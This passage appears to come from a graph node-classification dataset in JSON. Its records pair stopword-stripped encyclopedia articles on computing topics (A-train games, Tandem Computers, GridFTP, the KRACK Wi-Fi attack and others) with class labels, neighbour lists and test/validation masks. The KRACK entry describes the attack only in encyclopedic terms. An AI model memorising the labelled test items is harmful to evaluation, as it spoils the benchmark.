mark lefebvre described addictive pleasantly time-consuming simulation mike desmond sushi-x felt dull compared simulation games especially maxis titles scored 28 40 average 7 10 like desmond sushi-x gamepro felt game n't roll funfactor sim games next generation said quality management title unlikely set world aflame however released december 1996 japan windows 95 first a-train game use 3d graphics based powervr game engine also first numbered arabic numeral system instead roman numeral system previous 4 games re-released december 1997 time including support directx direct3d apis windows release time saw debut ps1 ps1 version re-released april 2007 psp ps3 released may 1999 japan ps1 re-released psp june 2006 released march 2000 japan ps2 launch title game also released europe features improved graphics a-train 5 a-train z released may 2001 japan ps2 improvement a-train 6 game dependencies installed stored playstation 2 expansion bay also first time people featured game expansion pack released 2002 continues boast strong fan base 2011 released june 19 2003 japan windows 95 98 2000 xp port a-train 2001 released docomo 504i/505i/506i/900 mobile phones service planning game distributed hudson soft players pay monthly fee access game game longer available march 2012 a-train 7 railroad simulation pc platform successor a-train 6 marketed 20th anniversary title a-train series revives urban development game play missing since a-train 5 released japan june 26 2005 windows xp vista several expansion packs released game released mobile phone company au kddi brew platform january 2006 distributed hudson soft similar a-train also service planning game railroad simulation xbox 360 windows released december 21 2006 japan supporting high definition graphics 720p resolution xbox live support uploading downloading maps leaderboards also first title published artdink a-train name japanese market also released europe gameplay similar a-train 7 full 3d view previously used a-train 21st century however comes map editor standard feature custom maps shared xbox live additional xbox live features includes leaderboards contain total capital population time 1 trillion yen categories map xbox live features used xbox live silver account artdink offered 150 types trains sale xbox live marketplace based real-life japanese trains game comes following trains designed artdink ar3 commuter ar4 express ar5 limitedexpress ar7 limitedexpress arx limitedexpress u-shape subway dc4 cargo ec6 cargoexpress 186exp superexpress linear superexpress release taiwan version publisher ttime technology held paper train model contest winning game eurogamer reported liked music a-train hx concluded a-train hx badly designed poorly presented overcomplicated utterly tedious giving score 2/10 official xbox 360 magazine gave slightly better score 3/10 however still called confusing train wreck game ever released march 21 2008 japan windows xp windows vista game also released europe a-train ds released april 23 2009 japan nintendo ds 5500 yen game featuring touch screen controls became first handheld title series 3d train view a-train 9 released february 11 2010 japan march 15 2012 worldwide uig entertainment names train giant english der bahn gigant german compatible windows xp vista 7 also compatible said 64-bit versions two japan-only building kits released first october 8 2010 second december 23 2010 japan version also includes 3d patch costing ¥1050 played using 3d glasses german version includes unofficial patch adds 200 trains game top existing 11 trains a-train 9 includes buses trucks grouped distances travel work manage e.g intercity local heavy goods etc power plants japanese castles authentic-looking japanese buildings december 7 2012 a-train 9 version 2.0 professional edition released japan supporting windows xp vista 7 8 available dvd format well software patch users original a-train 9 upgrade version 2.0 includes content two expansion packs intended original a-train 9 plus several new buildings trains well several bug fixes three dlcs released train giant starting august 1 2012 shanghai boston elbe estuary follow impossible find train giant purchased ebay 10 – 15 version 3 cover contains 3 dlcs june 29 2014 second new version entitled a-train version 3.0 railway simulator later released version released worldwide october 10 2014 via steam although due licensing issues fewer real life trains available japanese version october 21 2015 a-train 9 version 4.0 japan rail simulator released steam supporting windows xp vista 7 8.1 10 originally planned 2011 a-train 3d released japan february 13 2014 north america april 14 2015 europe april 16 2015 a-train city simulator published natsume nintendo eshop nintendo 3ds nintendo eshop pre-orders also received soundtrack based a-train 3d a-train pc classic released japanese steam december 14 2016 june 8 2017 english version officially released a-train express port a-train 9 playstation vr support released japan playstation 4 december 21 2017 january 2019 game received rating esrb signalling publisher degica games intent bringing game united states",
    "neighbors": [
      1571,
      8937,
      5388,
      6797,
      9006,
      9166,
      10316,
      10931,
      2943,
      5215
    ],
    "mask": "None"
  },
  {
    "node_id": 1600,
    "label": 3,
    "text": "SunPCi:sunpci sunpci series single board computers pci connector adds hardware enables sun workstations act 'pc compatible computer includes x86 processor ram expansion ports onboard graphics controller allowing complete x86 operating environments sun workstations present incarnation sunpci iiipro based mobile 1.6-ghz amd athlon xp 2100+ processor cards successor sunpc series sbus cards sun pci iipro currently supported solaris 7 8 9 using tricks work solaris 10 sun pci iii iiipro supported solaris 9 10 appropriate updates recent opensolaris releases",
    "neighbors": [
      9665,
      11363,
      8007,
      5233,
      499
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1601,
    "label": 4,
    "text": "Truth_in_Caller_ID_Act_of_2009:truth caller id act 2009 caller id spoofing generally illegal united states done intent defraud cause harm wrongfully obtain anything value relevant federal statute truth caller id act 2009 make exceptions certain law-enforcement purposes callers also still allowed preserve anonymity choosing block outgoing caller id information phone lines act also targets caller id spoofing voip services illegal cause caller identification service knowingly transmit misleading inaccurate caller identification information intent defraud cause harm wrongfully obtain anything value ... forfeiture penalties criminal fines 10,000 per violation exceed 1,000,000 could imposed law maintains exemption blocking one outgoing caller id information government n't affected detailed discussion legislative process gave rise applicable law follows april 6 2006 congressmen eliot engel d-n.y. joe barton r-tex introduced h.r 5126 bill would made caller id spoofing crime dubbed truth caller id act 2007 bill would outlawed causing caller identification service transmit misleading inaccurate caller identification information via telecommunications service ip-enabled voice service law enforcement exempted rule three weeks later identical bill introduced senate june 6 2006 house representatives passed truth caller id act although senate action taken either house senate bill end 109th congress bill expired pending legislation voted law end house term a.k.a end session congress dead january 5 2007 congressman engel introduced h.r 251 senator bill nelson d-fla. introduced similar bill s.704 two months later june 27 2007 united states senate committee commerce science transportation approved submitted senate calendar s.704 bill would made caller id spoofing crime dubbed truth caller id act 2007 bill would outlawed causing caller identification service transmit misleading inaccurate caller identification information via telecommunications service ip-enabled voice service law enforcement exempted rule engel bill passed house representatives engel bill referred senate committee approved s.704 senate passed neither version legislation 111th congress congressman engel senator nelson introduced similar versions caller id legislation h.r 1258 bill reintroduced senate january 7 2009 s.30 truth caller id act 2009 referred committee senate house passed respective versions legislation december 15 2010 house passed s.30 sent legislation president signature december 22 2010 president obama signed bill law new york times sent number 111-111-1111 calls made offices 15 august 2011 fake number intended prevent extensions reporters appearing call logs thus protect reporters divulge calls made anonymous sources times abandoned practice proposed changes caller id law many companies blocking calls well-known number",
    "neighbors": [
      7730,
      9572,
      8950
    ],
    "mask": "None"
  },
  {
    "node_id": 1602,
    "label": 7,
    "text": "Mobile_cloud_computing:mobile cloud computing mobile cloud computing mcc combination cloud computing mobile computing wireless networks bring rich computational resources mobile users network operators well cloud computing providers ultimate goal mcc enable execution rich mobile applications plethora mobile devices rich user experience mcc provides business opportunities mobile network operators well cloud providers comprehensively mcc defined rich mobile computing technology leverages unified elastic resources varied clouds network technologies toward unrestricted functionality storage mobility serve multitude mobile devices anywhere anytime channel ethernet internet regardless heterogeneous environments platforms based pay-as-you-use principle mcc uses computational augmentation approaches computations executed remotely instead device resource-constraint mobile devices utilize computational resources varied cloud-based resources mcc four types cloud-based resources namely distant immobile clouds proximate immobile computing entities proximate mobile computing entities hybrid combination three model giant clouds amazon ec2 distant immobile groups whereas cloudlet surrogates member 9apps proximate immobile computing entities smartphones tablets handheld devices wearable computing devices part third group cloud-based resources proximate mobile computing entities vodafone orange verizon started offer cloud computing services companies mcc landscape amalgam mobile computing cloud computing communication networks augment smartphones creates several complex challenges mobile computation offloading seamless connectivity long wan latency mobility management context-processing energy constraint vendor/data lock-in security privacy elasticity hinder mcc success adoption although significant research development mcc available literature efforts following domains still lacking several academic industrial research groups mcc emerging since last years mcc research groups academia large number researchers publications include cloud computing mobail network",
    "neighbors": [
      4194,
      6595,
      7492,
      5637,
      6,
      3626,
      6763,
      9356,
      754,
      2259,
      1524,
      5202,
      5875,
      10393,
      3162,
      1083,
      6301,
      11391
    ],
    "mask": "Test"
  },
  {
    "node_id": 1603,
    "label": 2,
    "text": "Home_screen:home screen home screen homescreen start screen main screen mobile operating system computer program home screens identical users rearrange icons please home screens often differ across mobile operating systems almost every smartphone form home screen typically displays links applications settings notifications home screens usually consist grid application links shortcuts often arranged multiple pages serve user main method accessing phone functions home screens also tend include dock along edge screen application links stored accessed page home screen operating systems allow users add folders home screen order organize application links home screens may also include pane push notifications displayed select system settings accessed addition applications links many home screens also capable displaying ambient information live tiles windows phone widgets android tiles widgets may link applications however differ traditional links show current dynamic information instead static icon however increased relevance information come cost device battery life bandwidth ease recognition afforded static application icons although home screens similar structure designed common two notable examples less-common home screens paradigms include siri webos former apple natural language user interface performs functions similar traditional home screens opening applications displaying relevant data managing phone settings latter notable use entirely dynamic application icons mimic current state application similar task managers mobile operating systems although mobile operating systems include default home screen devices also allow user replace native home screen different application third-party home screen allowing additional home screen paradigms one first examples home screen found palmpilot debuted 1997 early home screens often less customizable current iterations example early versions ios allow users rearrange applications home screen change background image home screens often serve main method interacting mobile operating systems tend change slowly across updates operating system",
    "neighbors": [
      3522,
      2852,
      5989,
      5164,
      8046,
      2259,
      1621,
      1083
    ],
    "mask": "Test"
  },
  {
    "node_id": 1604,
    "label": 3,
    "text": "Samsung_DP900:samsung dp900 dp900a7a-s01 all-in-one desktop computer 27 3d display developed samsung samsung dp900 features intel core i7-2600s 2.8 ghz cpu 8 gb ddr3 ram 1 tb sata 7200rpm hdd blu-ray/dvd combo drive wireless keyboard mouse 27 3d led display 16:9 widescreen aspect ratio full hd resolution 1920 x 1080 high quality sound optimized jbl graphics card amd radeon hd 6730m dp900 several ports including headphone microphone 4 usb 2.0 2 usb 3.0 ports multicard slot antenna hdmi lan port computer also supports wi-fi ieee 802.11b ieee 802.11g ieee 802.11n bluetooth dp900 released 64-bit windows 7 home premium operating system",
    "neighbors": [
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 1605,
    "label": 8,
    "text": "ProBiS:probis probis computer software allows prediction binding sites corresponding ligands given protein structure initially probis developed probis algorithm janez konc dušanka janežič 2010 available probis server probis charmming server probis algorithm probis plugin name probis originates purpose software predict given protein structure binding sites corresponding ligands probis software started probis algorithm detects structurally similar sites protein surfaces local surface structure alignment using fast maximum clique algorithm probis algorithm followed probis server provides access program probis detects protein binding sites based local structural alignments two probis servers available probis server probis charmming server latter connects probis charmming servers one functional unit enables prediction protein−ligand complexes allows geometry optimization interaction energy calculation probis charmming server additional functions used national institutes health usa otherwise acts regular probis server additionally probis pymol plugin probis ucsf chimera plugin made plugins connected via internet newly prepared database pre-calculated binding site comparisons allow fast prediction binding sites existing proteins protein data bank enable viewing predicted binding sites ligands poses three-dimensional graphics",
    "neighbors": [
      225,
      8644,
      7983,
      5397,
      2901
    ],
    "mask": "Test"
  },
  {
    "node_id": 1606,
    "label": 3,
    "text": "Tandem_Computers:tandem computers tandem computers inc. dominant manufacturer fault-tolerant computer systems atm networks banks stock exchanges telephone switching centers similar commercial transaction processing applications requiring maximum uptime zero data loss company founded jimmy treybig 1974 cupertino california remained independent 1997 became server division within compaq server division within hewlett packard enterprise following hewlett-packard acquisition compaq split hewlett packard hp inc. hewlett packard enterprise tandem nonstop systems use number independent identical processors redundant storage devices controllers provide automatic high-speed failover case hardware software failure contain scope failures corrupted data multi-computer systems shared central components even main memory conventional multi-computer systems use shared memories work directly shared data objects instead nonstop processors cooperate exchanging messages across reliable fabric software takes periodic snapshots possible rollback program memory state besides handling failures well shared-nothing messaging system design also scales extremely well largest commercial workloads doubling total number processors would double system throughput maximum configuration 4000 processors contrast performance conventional multiprocessor systems limited speed shared memory bus switch adding 4–8 processors manner gives system speedup nonstop systems often bought meet scaling requirements extreme fault tolerance compete well ibm largest mainframes despite built simpler minicomputer technology tandem computers founded 1974 james jimmy treybig treybig first saw market need fault tolerance oltp online transaction processing systems running marketing team hewlett packard hp 3000 computer division hp interested developing niche joined venture capital firm kleiner perkins developed tandem business plan treybig pulled together core engineering team hired away hp 3000 division mike green jim katzman dave mackie jack loustaunou business plan called ultra-reliable systems never outages never lost corrupted data modular new way safe single-point failures yet would marginally expensive conventional non-fault-tolerant systems would less expensive support throughput existing ad-hoc toughened systems used redundant usually required hot spares engineer confident could quickly pull part tricky new design doubted others areas could worked parts hardware software design different largely based incremental improvements familiar hardware software designs hp 3000 many subsequent engineers programmers also came hp tandem headquarters cupertino california quarter mile away hp offices initial venture capital investment tandem computers came tom perkins formerly general manager hp 3000 division business plan included detailed ideas building unique corporate culture reflecting treybig values design initial tandem/16 hardware completed 1975 first system shipped citibank may 1976 company enjoyed uninterrupted exponential growth 1983 inc. magazine ranked tandem fastest-growing public company america 40 years tandem main nonstop product line grown evolved upward-compatible way initial t/16 fault-tolerant system three major changes date top-level modular architecture programming-level instruction set architecture within series several major re-implementations chip technology progressed conventional systems era including large mainframes mean-time-between-failures mtbf order days nonstop system designed failure intervals 100 times longer uptimes measured years nevertheless nonstop designed price-competitive conventional systems simple 2-cpu system priced twice competing single-processor mainframe opposed four times fault-tolerant solutions first system tandem/16 t/16 later re-branded nonstop machine consisted two 16 cpus organized fault-tolerant computer cluster packaged single rack cpu private unshared memory i/o processor private i/o bus connect i/o controllers dual connections cpus custom inter-cpu backplane bus called dynabus disk controller network controller duplicated dual connections cpus devices disk mirrored separate connections two independent disk controllers disk failed data still available mirrored copy cpu controller bus failed disk still reachable alternative cpu controller and/or bus disk network controller connected two independent cpus power supplies wired one side pair cpus controllers buses system would keep running well without loss connections one power supply failed careful complex arrangement parts connections customers larger configurations documented mackie diagram named lead salesman david mackie invented notation none duplicated parts wasted hot spares everything added system throughput normal operations besides recovering well failed parts t/16 also designed detect many kinds intermittent failures possible soon possible prompt detection called fail fast point find isolate corrupted data permanently written databases disk files t/16 error detection added custom circuits added little cost total design major parts duplicated get error detection t/16 cpu proprietary design greatly influenced hp 3000 minicomputer microprogrammed 16-bit stack-based machines segmented 16-bit virtual addressing intended programmed exclusively high-level languages use assembler initially implemented via standard low-density ttl chips holding 4-bit slice 16-bit alu small number top-of-stack 16-bit data registers plus extra address registers accessing memory stack used huffman encoding operand address offsets fit large variety address modes offset sizes 16-bit instruction format good code density relied heavily pools indirect addresses overcome short instruction format supported larger 32- 64-bit operands via multiple alu cycles memory-to-memory string operations used big-endian addressing long versus short memory operands features inspired burroughs b5500-b6800 mainframe stack machines t/16 instruction set changed several features hp 3000 design t/16 supported paged virtual memory beginning hp 3000 series add paging pa-risc generation 10 years later although mpe v form paging via apl firmware 1978 tandem added support 32-bit addressing second machine hp 3000 lacked pa-risc generation paging long addresses critical supporting complex system software large applications t/16 treated top-of-stack registers novel way compiler microcode responsible deciding full registers spilled memory stack empty registers re-filled memory stack hp 3000 decision took extra microcode cycles every instruction hp 3000 supported cobol several instructions calculating directly arbitrary-length bcd binary-coded decimal strings digits t/16 simplified single instructions converting bcd strings 64-bit binary integers t/16 cpu consisted two boards ttl logic srams ran 0.7 mips instant could access four virtual memory segments system data system code user data user code limited 128 kb size 16-bit address spaces already small major applications shipped first release t/16 single programming language transaction application language tal efficient machine-dependent systems programming language operating systems compilers etc could also used non-portable applications derived hp 3000 system programming language spl semantics similar c syntax based burroughs algol subsequent releases added support cobol74 fortran mumps tandem nonstop series ran custom operating system significantly different unix hp 3000 mpe initially called t/tos tandem transactional operating system soon named guardian ability protect data machine faults software faults contrast commercial operating systems guardian based message passing basic way processes interact without shared memory regardless processes running approach easily scaled multiple-computer clusters helped isolate corrupted data propagated file system processes transactional application processes structured master/slave pairs processes running separate cpus slave process periodically took snapshots master memory state took workload master process ran trouble allowed application survive failures cpu associated devices without data loss allowed recovery intermittent-style software failures failures monitoring slave process added performance overhead far less 100 duplication system designs major early applications directly coded checkpoint style instead used various tandem software layers hid details semi-portable way 1981 t/16 cpus replaced nonstop ii main difference t/16 support occasional 32-bit addressing via user-switchable extended data segment supported next ten years growth software huge advantage t/16 hp 3000 unfortunately visible registers remained 16-bit unplanned addition instruction set required executing many instructions per memory reference compared 32-bit minicomputers subsequent tns computers hampered instruction set inefficiency also nonstop ii lacked wider internal data paths required additional microcode steps 32-bit addresses nonstop ii cpu three boards using chips design similar t/16 nonstop ii also replaced core memory battery-backed dram memory 1983 nonstop txp cpu first entirely new implementation tns instruction set architecture built standard ttl chips programmed array logic chips four boards per cpu module tandem first use cache memory direct implementation 32-bit addressing still sent 16-bit adders wider microcode store allowed major reduction cycles executed per instruction speed increased 2.0 mips used rack packaging controllers backplane buses dynabus i/o buses overdesigned t/16 would work several generations upgrades 14 txp nonstop ii systems could combined via fox long-distance fault-tolerant fibre optic bus connecting tns clusters across business campus cluster clusters total 224 cpus allowed scale-up taking largest mainframe applications like cpu modules within computers guardian could failover entire task sets machines network worldwide clusters 4000 cpus could also built via conventional long-haul network links 1986 tandem introduced third generation cpu nonstop vlx 32-bit datapaths wider microcode 12 mhz cycle time peak rate one instruction per microcycle built three boards ecl gate array chips ttl pinout revised dynabus speed raised 20 mbytes/sec per link 40 mbytes/sec total fox ii increased physical diameter tns clusters 4 kilometers tandem initial database support hierarchical non-relational databases via enscribe file system extended relational database called encompass 1986 tandem introduced first fault-tolerant sql database nonstop sql developed totally in-house nonstop sql includes number features based guardian ensure data validity across nodes nonstop sql famous scaling linearly performance number nodes added system whereas databases performance plateaued quite quickly often two cpus later version released 1989 added transactions could spread nodes feature remained unique time nonstop sql continued evolve first sql/mp sql/mx transitioned tandem compaq hp code remains use hp sql/mx apache trafodion incubating project 1987 tandem introduced nonstop clx low-cost less-expandable minicomputer system role growing low end fault-tolerant market deploying remote edges large tandem networks initial performance roughly similar txp later versions 20 slower vlx small cabinet could installed copier room office environment clx cpu one board containing six compiled silicon asic cmos chips cpu core chip duplicated lock stepped maximal error detection pinout main limitation chip technology microcode cache tlb external cpu core shared single bus single sram memory bank result clx required least two machine cycles per instruction 1989 tandem introduced nonstop cyclone fast expensive system mainframe end market self-checking cpu took three boards full hot-running ecl gate array chips plus memory boards despite microprogrammed cpu superscalar often completing two instructions per cache cycle accomplished separate microcode routine every common pair instructions fused pair stack instructions generally accomplished work single instruction normal 32-bit minicomputers cyclone processors packaged sections four cpus sections joined fiber optic version dynabus like tandem prior high end machines cyclone cabinets styled lots angular black suggest strength power advertising videos directly compared cyclone sr-71 blackbird mach 3 spy plane cyclone name supposed represent unstoppable speed roaring oltp workloads announcement day october 17 press came town afternoon region struck magnitude 6.9 loma prieta earthquake causing freeway collapses oakland major fires san francisco tandem offices shaken one badly hurt site first last time tandem named products natural disaster 1980–1983 tandem attempted re-design entire hardware software stack put nonstop methods stronger foundation inherited hp 3000 traits rainbow hardware 32-bit register-file machine aimed better vax reliable programming main programming language tpl subset ada time people barely understood compile ada unoptimized code migration path existing nonstop system software coded tal os database cobol compilers entirely redesigned customers would see totally disjoint product line requiring all-new software software side ambitious project took much longer planned hardware already obsolete out-performed txp software ready rainbow project abandoned subsequent efforts emphasized upward compatibility easy migration paths development rainbow advanced client/server application development framework called crystal continued awhile longer spun ellipse product cooperative systems inc 1985 tandem attempted grab piece rapidly growing personal computer market introduction ms-dos based dynamite pc/workstation sadly numerous design compromises including unique 8086-based hardware platform incompatible expansion cards day extremely limited compatibility ibm-based pcs relegated dynamite serving primarily smart terminal quietly quickly withdrawn market tandem message-based nonstop operating system advantages scaling extreme reliability efficiently using expensive spare resources many potential customers wanted good-enough reliability small system using familiar unix operating system industry-standard programs tandem various fault-tolerant competitors adopted simpler hardware-only memory-centric design recovery done switching hot spares successful competitor stratus technologies whose machines re-marketed ibm ibm system/88 systems spare processors contribute system throughput failures merely redundantly execute exactly data thread active processor instant lock step faults detected seeing cloned processors outputs diverged detect failures system must two physical processors logical active processor also implement automatic failover recovery system must three four physical processors logical processor triple quadruple cost sparing practical duplicated parts commodity single-chip microprocessors tandem products market began integrity line 1989 using mips processors nonstop ux variant unix developed austin tx 1991 integrity s2 used tmr triple modular redundancy logical cpu used three mips r2000 microprocessors execute data thread voting find lock failed part fast clocks could synchronized strict lock stepping voting instead happened interrupt version integrity used 4x pair spares redundancy pairs processors ran lock-step check disagreed processors marked untrusted workload taken hot-spare pair processors whose state already current 1995 integrity s4000 first use servernet moved toward sharing peripherals nonstop line 1995–1997 tandem partnered microsoft implement high-availability features advanced sql configurations clusters commodity windows nt machines project called wolfpack first shipped microsoft cluster server 1997 microsoft benefited greatly partnership tandem tandem formed 1974 every computer company design build cpus basic circuits using proprietary instruction set compilers etc year semiconductor progress moore law cpu core circuits could fit single chips run faster much cheaper result became increasingly expensive computer company design advanced custom chips build plants fabricate chips 1991 biggest companies could continue design build competitive cpus tandem big enough needed move nonstop product line customer base onto advanced microprocessor chip set designed built others hp hp 3000 division similar roadmap problems found clever way forward 1986 hp labs designed pa-risc computer core stripped non-essentials could soon fit one chip efficiently pipelined ran even faster ecl mainframes time many times faster microprogrammed cmos stack machines rest hp designing migrate vendor customer third-party software existing product lines software portable could directly recompiled new instruction set software easily recompiled hp labs invented efficient ways run old binaries software new machine emulation automatic translation binary object code told everyone similar object code translation techniques subsequently used apple computers move macintosh software m68000 machines powerpc machines digital equipment corporation move vms users vaxes alpha machines one flaw hp 3000 migration plan hp also ambitiously tried rewrite entire mpe operating system new language time n't plan use emulation techniques primary code rewrite native mode took years longer complete expected hp first generation risc hardware already obsolete mpe software ready release tandem learned mistake tandem could use hp pa-risc sun sparc cpus business reasons instead tandem partnered mips adopted r3000 successor chipsets advanced optimizing compiler subsequent nonstop guardian machines using mips architecture known programmers tns/r machines variety marketing names 1991 tandem released cyclone/r also known clx/r low cost mid-range system based clx components used r3000 microprocessors instead much slower clx stack machine board minimize time market machine initially shipped without mips native-mode software everything including nsk operating system sql database compiled tns stack machine code object code translated equivalent partially optimized mips instruction sequences kernel install time tool called accelerator less-important programs could also executed directly without pre-translation via tns code interpreter migration techniques successful still use today everyone software brought without extra work performance good enough mid-range machines programmers could ignore instruction differences even debugging machine code level cyclone/r machines updated faster native-mode nsk follow-up release r3000 later microprocessors typical amount internal error checking insufficient tandem needs cyclone/r ran pairs r3000 processors lock step running data thread used curious variation lock stepping checker processor ran 1 cycle behind primary processor allowed share single copy external code data caches without putting excessive pinout load sysbus lowering system clock rate successfully run microprocessors lock step chips must designed fully deterministic hidden internal state must cleared chip reset mechanism otherwise matched chips sometimes get sync visible reason without faults long chips restarted chip designers agree good principles helps test chips manufacturing time new microprocessor chips seemed bugs area required months shared work mips tandem eliminate work around final subtle bugs 1993 tandem released nonstop himalaya k-series faster mips r4400 native mode nsk fully expandable cyclone system components still connected dynabus dynabus+ original i/o bus running performance headroom 1994 nonstop kernel extended unix-like posix environment called open system services original guardian shell abi remained available 1997 tandem introduced nonstop himalaya s-series new top-level system architecture based servernet connections servernet replaced obsolete dynabus fox i/o buses much faster general could extended two-way redundancy via arbitrary fabric point-to-point connections tandem designed servernet needs promoted use others evolved infiniband industry standard s-series machines used mips processors including r4400 r10000 r12000 r14000 design later faster mips cores primarily funded silicon graphics inc intel pentium pro overtook performance risc designs also sgi graphics business shrunk r10000 investment significant new mips core designs high-end servers tandem needed eventually move nonstop product line yet onto microprocessor architecture competitive fast chips jimmy treybig remained ceo company founded downturn 1996 next ceo roel pieper joined company 1996 president ceo re-branding promote true wintel windows/intel platform conducted in-house brand creative team led ronald may later went co-found silicon valley brand forum 1999 concept worked shortly thereafter company acquired compaq compaq x86-based server division early outside adopter tandem servernet/infiniband interconnect technology 1997 compaq acquired tandem computers company nonstop customer base balance compaq heavy focus low-end pcs 1998 compaq also acquired much larger digital equipment corporation inherited dec alpha risc servers openvms tru64 unix customer bases tandem midway porting nonstop product line mips r12000 microprocessors intel new itanium merced microprocessors project restarted alpha new target align nonstop compaq large server lines 2001 compaq terminated alpha engineering investments favor itanium microprocessors 2001 hewlett packard similarly made choice abdicate successful pa-risc product lines favor intel itanium microprocessors hp helped design shortly thereafter compaq hp announced plan merge consolidate similar product lines contentious merger became official may 2002 consolidations painful destroyed dec hp way engineer-oriented cultures combined company know sell complex systems enterprises profit improvement surviving nonstop division customers ways tandem journey hp-inspired start-up hp-inspired competitor hp division bringing tandem back original roots definitely hp re-port nsk-based nonstop product line mips processors itanium-based processors finally completed branded hp integrity nonstop servers nsk integrity nonstop unrelated tandem original integrity series unix possible run itanium mckinley chips clock-level lock stepping integrity nonstop machines instead use comparisons chip states longer time scales interrupt points various software sync points interrupts intermediate sync points automatically triggered every n'th taken branch instruction also explicitly inserted long loop bodies nonstop compilers machine design supports dual triple redundancy either two three physical microprocessors per logical itanium processor triple version sold customers needing utmost reliability new checking approach called nsaa nonstop advanced architecture earlier migration stack machines mips microprocessors customer software carried forward without source changes native mode source code compiled directly mips machine code simply recompiled itanium older non native software still tns stack machine form automatically ported onto itanium via object code translation techniques people working tandem/hp long history porting kernel onto new hardware latest endeavor move itanium intel x86 architecture completed 2014 first systems already commercially available inclusion fault-tolerant 4x fdr fourteen data rate infiniband double-wide switches provides 25 times increase system interconnect capacity responding business growth nsk guardian also became base hp neoview os operating system used hp neoview systems tailored use business intelligence enterprise data warehouse use nonstop sql/mx also starting point neoview sql tailored business intelligence use code also ported linux served basis apache trafodion project",
    "neighbors": [
      512,
      7939,
      7173,
      7941,
      7303,
      5384,
      6281,
      3594,
      5523,
      2452,
      6675,
      7188,
      5658,
      6815,
      7076,
      8229,
      1702,
      8233,
      10413,
      7983,
      11447,
      1469,
      10048,
      6722,
      7234,
      10051,
      3142,
      9286,
      9677,
      9166,
      4817,
      11604,
      6742,
      7802,
      8282,
      477,
      1638,
      6247,
      6250,
      6252,
      5999,
      8944,
      4465,
      8700,
      1399,
      3960,
      3450,
      3323,
      6780,
      1278
    ],
    "mask": "Test"
  },
  {
    "node_id": 1607,
    "label": 7,
    "text": "GridFTP:gridftp gridftp extension file transfer protocol ftp grid computing protocol defined within gridftp working group open grid forum multiple implementations protocol widely used provided globus toolkit aim gridftp provide reliable high performance file transfer example enable transmission large files gridftp used extensively within large science projects large hadron collider many supercomputer centers scientific facilities gridftp also addresses problem incompatibility storage access systems previously data provider would make data available specific way providing library access functions made difficult obtain data multiple sources requiring different access method thus dividing total available data partitions gridftp provides uniform way accessing data encompassing functions different modes access building extending universally accepted ftp standard ftp chosen basis widespread use well defined architecture extensions protocol may dynamically discovered numerous gridftp clients developed globus online software-as-a-service system particularly popular gridftp integrates grid security infrastructure provides authentication encryption file transfers user-specified levels confidentiality data integrity also cross-server transfers ftp calls file exchange protocol fxp gridftp achieves much greater use bandwidth conventional data stream technology using multiple simultaneous tcp streams files downloaded pieces simultaneously multiple sources even separate parallel streams source still able make better use bandwidth striped interleaved transfers either multiple single sources allow speed increases although ftp ability resume interrupted file transfer specific point file support transmission certain portion file gridftp allows subset file sent feature useful applications small sections large data file required processing motivating example processing data high energy physics experiment traditional use grid technology gridftp provides fault tolerant implementation ftp handle network unavailability server problems transfers also automatically restarted problem occurs underlying tcp connection ftp numerous settings window size buffer size gridftp allows automatic manual negotiation settings provide optimal transfer speeds reliability optimal settings likely different large files large groups files",
    "neighbors": [
      609,
      4195,
      836,
      5956,
      7364,
      8905,
      7018,
      2797,
      6993,
      11353,
      7935
    ],
    "mask": "None"
  },
  {
    "node_id": 1608,
    "label": 4,
    "text": "KRACK:krack krack key reinstallation attack severe replay attack type exploitable flaw wi-fi protected access protocol secures wi-fi connections discovered 2016 belgian researchers mathy vanhoef frank piessens university leuven vanhoef research group published details attack october 2017 repeatedly resetting nonce transmitted third step wpa2 handshake attacker gradually match encrypted packets seen learn full keychain used encrypt traffic weakness exhibited wi-fi standard due errors implementation sound standard individual products implementations therefore correct implementation wpa2 likely vulnerable vulnerability affects major software platforms including microsoft windows macos ios android linux openbsd others widely used open-source implementation wpa_supplicant utilized linux android especially susceptible manipulated install all-zeros encryption key effectively nullifying wpa2 protection man-in-the-middle attack version 2.7 fixed vulnerability security protocol protecting large number wi-fi devices essentially bypassed potentially allowing attacker intercept sent received data attack targets four-way handshake used establish nonce kind shared secret wpa2 protocol standard wpa2 anticipates occasional wifi disconnections allows reconnection using value third handshake quick reconnection continuity standard require different key used type reconnection could needed time replay attack possible attacker repeatedly re-send third handshake another device communication manipulate reset wpa2 encryption key reset causes data encrypted using values blocks content seen matched working backwards identify parts keychain used encrypt block data repeated resets gradually expose keychain eventually whole key known attacker read target entire traffic connection according us-cert us-cert become aware several key management vulnerabilities 4-way handshake wi-fi protected access ii wpa2 security protocol impact exploiting vulnerabilities includes decryption packet replay tcp connection hijacking http content injection others note protocol-level issues correct implementations standard affected cert/cc reporting researcher ku leuven publicly disclosing vulnerabilities 16 october 2017 paper describing vulnerability available online formally presented acm conference computer communications security 1 november 2017 us-cert tracking vulnerability listed vu 228519 across multiple platforms following cve identifiers relate krack vulnerability wpa2 users may counter attack updating wi-fi client access point device software devices vendor patches available however vendors may delay offering patch provide patches case many older devices patches available different devices protect krack starting versions order mitigate risk vulnerable clients wpa2-enabled wi-fi access points configuration options disable eapol-key frame re-transmission key installation attackers cause re-transmissions delayed frame transmission thereby denying access network provided tdls enabled one disadvantage method poor connectivity key reinstallation failure may cause failure wi-fi link alternatively users unpatched devices disable wireless network connection use wired alternative – though may practical many scenarios mobile devices tablets october 2018 reports emerged krack vulnerability still exploitable spite vendor patches variety workarounds techniques used vendors close original attack",
    "neighbors": [
      1024,
      5636,
      4117,
      8726,
      535,
      9244,
      9761,
      4644,
      4133,
      8754,
      9784,
      3657,
      8779,
      10332,
      4703,
      8288,
      8292,
      10875,
      3711,
      8320,
      5764,
      2187,
      6797,
      4240,
      2709,
      1688,
      2717,
      9375,
      3248,
      9904,
      9395,
      8886,
      3789,
      4304,
      4314,
      9435,
      4830,
      3807,
      5349,
      1254,
      10477,
      9460,
      7418,
      4863,
      2815,
      3843,
      10502,
      10003,
      297,
      2857,
      8489,
      11052,
      9518,
      823,
      1337,
      3900,
      6484,
      857,
      1882,
      7515,
      3956,
      9082,
      11152,
      10132,
      4505,
      1440,
      5024,
      5028,
      11175,
      9640,
      5547,
      7601,
      1970,
      441,
      1979,
      4027,
      9664,
      8133,
      4054,
      7639,
      8664,
      1504,
      9186,
      2542,
      4081,
      8694,
      507
    ],
    "mask": "None"
  },
  {
    "node_id": 1609,
    "label": 9,
